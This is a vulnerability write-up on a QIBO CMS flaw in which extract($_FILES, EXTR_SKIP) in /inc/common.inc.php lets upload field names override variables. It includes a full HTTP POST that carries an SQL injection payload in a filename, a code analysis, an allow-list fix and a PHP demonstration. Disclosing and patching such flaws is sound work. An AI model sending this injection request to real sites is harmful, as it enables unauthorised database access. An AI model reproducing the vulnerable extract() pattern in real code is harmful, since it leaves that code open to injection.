
QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

Jun 06, 2016 pm 07:48 PM
cms


Contents

1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Vulnerable Code Analysis
5. Mitigation
6. Offensive and Defensive Thoughts

1. Vulnerability Description

QIBO CMS's /inc/common.inc.php registers external input as local variables using logic such as $$_key = $value and extract(). This emulates register_globals for GPC (GET/POST/COOKIE) data, but it also introduces the security risks of "local variable overriding" and "uninitialized local variables".

The vulnerable file /inc/common.inc.php uses @extract($_FILES, EXTR_SKIP) to register each entry of $_FILES as a variable, relying on EXTR_SKIP to avoid overwriting variables that already exist. Overriding a variable that has not been initialized yet is enough to cause an SQL injection.

Relevant Link:

http://bbs.qibosoft.com/read-forum-tid-422299.htm


2. Trigger Conditions

0x1: Attack entry point

Construct a $_FILES entry that overrides the $cidDB variable and POST it to /member/comment.php

1. First open the "Comment Management" (评论管理) function under /member and capture the request.

2. Add an attachment to the HTTP request, as follows:

POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/qibo/member/comment.php?job=work
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=jo9rpav7l51iakidv01vr9fem1;
passport=1%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%0922%091425969668%09http%3A%2F%2F127.0.0.1%2Fqibo%2Fmember%2Fcomment.php%3Fjob%3Dwork
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Length: 227

------WebKitFormBoundary6ukpBHoIrpHKtOkl
Content-Disposition: form-data; name="cidDB"; filename="1' and EXP(~(select * from(select user())a)) -- "
Content-Type: text/plain

1111
------WebKitFormBoundary6ukpBHoIrpHKtOkl--

Note: remove the original cidDB[]=x from the URL, then build a file-upload request (changing the method from GET to POST) and put the injection payload in the filename field.

3. Submit the packet and the injection succeeds.
// This variable override exploits the fact that extract's EXTR_SKIP only checks variables that already exist; variables that were never declared can still be set from the outside.

Relevant Link:

http://bobao.360.cn/learning/detail/291.html


3. Affected Scope

All QIBO systems, all versions


4. Vulnerable Code Analysis

\qibo\inc\common.inc.php

/*
Filtering of GPC variables in the global-variables file.
As the code shows, POST content is affected by the GPC filtering while values passed through $_FILES are not, so only the $key names of the $_FILES entries can be used to bypass the Add_S function.
Because $_FILES entries are passed as arrays, the $_FILES $key can be used to override a variable by default.
*/
$_POST=Add_S($_POST);
$_GET=Add_S($_GET);
$_COOKIE=Add_S($_COOKIE);

function Add_S($array)
{
    foreach($array as $key=>$value)
    {
        if(!is_array($value))
        {
            $value=str_replace("&#x","& # x",$value);    // filter some unsafe characters
            $value=preg_replace("/eval/i","eva l",$value);    // filter unsafe functions
            !get_magic_quotes_gpc() && $value=addslashes($value);
            $array[$key]=$value;
        }
        else
        {
            $array[$key]=Add_S($array[$key]);
        }
    }
    return $array;
}

if(!ini_get('register_globals'))
{
    @extract($_FILES,EXTR_SKIP);    // $_FILES is never passed through Add_S; EXTR_SKIP only skips names that already exist
}

foreach($_COOKIE AS $_key=>$_value)
{
    unset($$_key);
}
foreach($_POST AS $_key=>$_value)
{
    !ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value)
{
    !ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}


5. Mitigation

\qibo\inc\common.inc.php

if(!ini_get('register_globals'))
{
    // register only the expected upload field names instead of extract()ing all of $_FILES
    $array = array('Filedata','postfile','upfile','fileData','Filedata');
    foreach($array AS $key=>$value)
    {
        is_array($_FILES[$value]) && $$value = $_FILES[$value];
    }
}
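The following is an added example (not QIBO's own code) that replays the registration logic from sections 4 and 5 against a constructed $_FILES array, so the difference between extract($_FILES, EXTR_SKIP) and the allow-listed registration can be seen outside the CMS; the field names and file metadata are constructed.

```php
<?php
// Added example, not QIBO's own code: replays the registration logic of
// /inc/common.inc.php against a constructed $_FILES array to show why
// EXTR_SKIP only protects variables that already exist.

// Constructed stand-in for a multipart request: one field named "cidDB"
// (a name the application uses) and one named "job" (pre-defined below).
$_FILES = [
    'cidDB' => ['name' => "x'", 'type' => 'text/plain',   // quote survives: $_FILES is never escaped
                'tmp_name' => '/tmp/phpAbC123', 'error' => 0, 'size' => 4],
    'job'   => ['name' => 'x', 'type' => 'text/plain',
                'tmp_name' => '/tmp/phpDeF456', 'error' => 0, 'size' => 1],
];

// Vulnerable pattern: every $_FILES key becomes a local variable unless a
// variable of that name is already defined. $_FILES never goes through
// Add_S(), so whatever lands in $cidDB is unescaped.
function register_files_vulnerable(array $files): array
{
    $job = 'work';                 // pre-defined: EXTR_SKIP leaves it alone
    extract($files, EXTR_SKIP);    // $cidDB did not exist, so it is created
    return ['job' => $job, 'cidDB' => $cidDB ?? null];
}

// Fixed pattern (the one the mitigation section adopts): copy only the
// upload field names the application actually uses; other keys are ignored.
function register_files_allowlisted(array $files): array
{
    $allowed = ['Filedata', 'postfile', 'upfile', 'fileData'];
    $vars = [];
    foreach ($allowed as $name) {
        if (isset($files[$name]) && is_array($files[$name])) {
            $vars[$name] = $files[$name];
        }
    }
    return $vars;
}

$v = register_files_vulnerable($_FILES);
// 'job' keeps its pre-defined value, but 'cidDB' now holds the raw,
// client-chosen filename with its quote intact.
var_dump($v);

$f = register_files_allowlisted($_FILES);
// No 'cidDB' key here: an unexpected field name cannot define a variable.
var_dump($f);
```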


6. Offensive and Defensive Thoughts

Copyright (c) 2014 LittleHann All rights reserved

 
